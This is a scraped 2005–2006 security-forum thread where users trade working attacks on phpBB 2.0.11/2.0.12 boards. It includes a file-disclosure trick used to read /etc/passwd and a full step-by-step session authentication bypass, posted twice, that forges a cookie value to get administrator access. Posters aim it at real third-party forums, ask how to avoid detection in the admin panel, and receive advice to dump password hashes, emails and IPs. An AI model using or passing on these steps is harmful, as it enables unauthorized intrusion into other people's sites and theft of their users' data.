|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 71
Members: 0
Total: 71
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
2.0.11 Arbitrary File Disclosure Vulnerability |
|
Posted: Tue Apr 05, 2005 9:37 pm |
|
|
kingspice |
Beginner |
|
|
Joined: Apr 05, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
"An attacker can exploit this input validation condition by selecting an avatar from the local machine that meets the board guidelines and can then fill the "Upload Avatar from a URL:" field with the path to an arbitrary file (ex: /etc/passwd). When the avatar is submitted, the destination image of the submitted avatar will contain the contents of the requested file."
Have tried this exploit, however what files can i download that will provide information to me that is useful?
Can download /etc/passwd, however need /etc/shadow to get passwords which the server doesn't allow access to.
Also, are there any better exploits for version 2.0.11?
Kingspice |
|
|
|
|
Posted: Wed Apr 06, 2005 6:40 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
u could use Session Handling Authentication Bypass,
read about this in this forum too .. |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Wed Apr 06, 2005 12:55 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Yeah just use the 2.0.12 exploit. That ll work for 2.0.11:
phpBB 2.0.12 Session Handling Authentication Bypass ..
easy to use exploit ..
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !!
complete the mission by clicking " Go to Administration Panel "
--------------------------------------------------------------------------------
written by : Ali7
e-mail : ali7@hotmail.co.uk |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Thu May 12, 2005 1:52 am |
|
|
cas |
Beginner |
|
|
Joined: May 12, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
I can't get this exploit working on a 2.0.11 forum ;(
This is my cookies.txt before editing:
Quote: | # HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.
publishers.clickbooth.com FALSE / FALSE 1115970477 directtrack_rotation_integraclick 3
publishers.clickbooth.com FALSE / FALSE 1115948877 universal_adpool_cookie2_1122_24_13060 %2C3%7C1%7C1115862596
getaforum.com FALSE / FALSE 1147398471 phpbb_russ05_data a%3A0%3A%7B%7D
getaforum.com FALSE /phpbb2/ FALSE 1147398471 ForumSetCookie russ05
|
and this is what is looks like after the edit:
Quote: | # HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.
publishers.clickbooth.com FALSE / FALSE 1115970477 directtrack_rotation_integraclick 3
publishers.clickbooth.com FALSE / FALSE 1115948877 universal_adpool_cookie2_1122_24_13060 %2C3%7C1%7C1115862596
getaforum.com FALSE / FALSE 1147398471 phpbb_russ05_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
getaforum.com FALSE /phpbb2/ FALSE 1147398471 ForumSetCookie russ05
|
I've also tried replacing the "userid" and "autologinid" with usernames from the forum, without any changes when I reopen the browser..
Using Firefox 1.0.3 |
|
|
|
|
|
|
|
|
Posted: Thu May 12, 2005 6:27 am |
|
|
devn00b |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
They could have manually patched the forums. Its a simple fix realy. My forums still show as .8 but are updated with all the current fixes. |
|
|
|
|
Posted: Thu May 12, 2005 11:32 pm |
|
|
cas |
Beginner |
|
|
Joined: May 12, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
any way to find the real version number?
if anyone wants to give it a try, here's the url:
[removed] |
|
|
|
|
Posted: Fri May 13, 2005 12:48 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Sorry:P but the rules 1 and 1a clearly say:
Quote: | 1) No Posting of IP Addresses or Vulnerable WebSites in the forum
1a) When posting an IP address of a machine when discussing an issue should be done as follows. Xxx.xxx.xxx.xxx |
If you wish to get someone to help you: email or PM someone and ask them if they could. Then send them the URL if they answer yes.
For all those who have not read the rules I suggest you read them.
http://www.waraxe.us/ftopict-57.html
Thanks
Shai-tan |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Thu Oct 13, 2005 4:05 pm |
|
|
Michael_Brad |
Regular user |
|
|
Joined: Oct 13, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
Hey,
I've been searching for resources of "hacking phpBB" for a loooong time. Good to know that I finally found the method...indeed it is simple.
Right, I want to thank you guys for the help on that, however.....if you could help me a little bit over here I would appreciate it!
Right so I have tried editing my cookies and saving them at a few phpBB message boards...but none of them worked. I eventually found out that the reason as to why it would not work, is because my cookies weren't "edited" properly. When I would "replace the text" and went <File < Save the "changes" would not be saved.
Yeah I know, you probably just figured I know nothing about computers...lol. Well I do know a fair bit, but this one I don't know. So if anyone could help me a bit here as to how "save" the changes I have made to my cookies...would be greatly appreciated.
PS Sorry I had to bring this topic back from the dead... |
|
|
|
|
|
|
|
|
Posted: Thu Oct 13, 2005 11:48 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
see the permission of the file , are you have some rights to write the file ?
or make ur self someone has right such as administrator in windows or root in *nix |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Fri Oct 14, 2005 5:42 pm |
|
|
Michael_Brad |
Regular user |
|
|
Joined: Oct 13, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
Bleh just ignore me I figured it all out now...AND made it work!
Question btw...if I simply have a look at the admin panel, but I do NOT make any changes, then I will not be caught. Is that correct? Cheers |
|
|
|
|
Posted: Sat Oct 15, 2005 11:03 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
This really depends on how many admins there are and what addons they have on the board. Because if they are in the admin panel at the same time and see one of the other admins logged on under a different to usual IP then...... if they have a 3rd party admin or IP logger addon then they may catch you that way. Other wise I would just back up their database and get more md5s and email addys and IPs and websites and anything else. Also veiw whats in the admin forum for the hell of it. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Sat Oct 15, 2005 3:58 pm |
|
|
Michael_Brad |
Regular user |
|
|
Joined: Oct 13, 2005 |
Posts: 5 |
|
|
|
|
|
|
|
Cheers for the info...Yeah will not be using this when an admin is already browsing the boards. Now all I need to do is wait for the exploit on 2.0.18 version/phpBB to be released.
Someone told me btw that he was able to hack a phpBB forum, even if it was patched. Makes me wonder how that is possible - but cheers for the responses anyhow. |
|
|
|
|
|
|
|
|
Posted: Wed Mar 08, 2006 10:04 am |
|
|
Musaaf |
Beginner |
|
|
Joined: Mar 08, 2006 |
Posts: 3 |
|
|
|
|
|
|
|
shai-tan wrote: | Yeah just use the 2.0.12 exploit. That ll work for 2.0.11:
phpBB 2.0.12 Session Handling Authentication Bypass ..
easy to use exploit ..
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor
3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//
save the cookies.txt..
4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !!
complete the mission by clicking " Go to Administration Panel "
--------------------------------------------------------------------------------
written by : Ali7
e-mail : ali7@hotmail.co.uk |
I have tried this on a site but it did not work maybe its the latest phpbb?
are there any exploits for the new version |
|
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|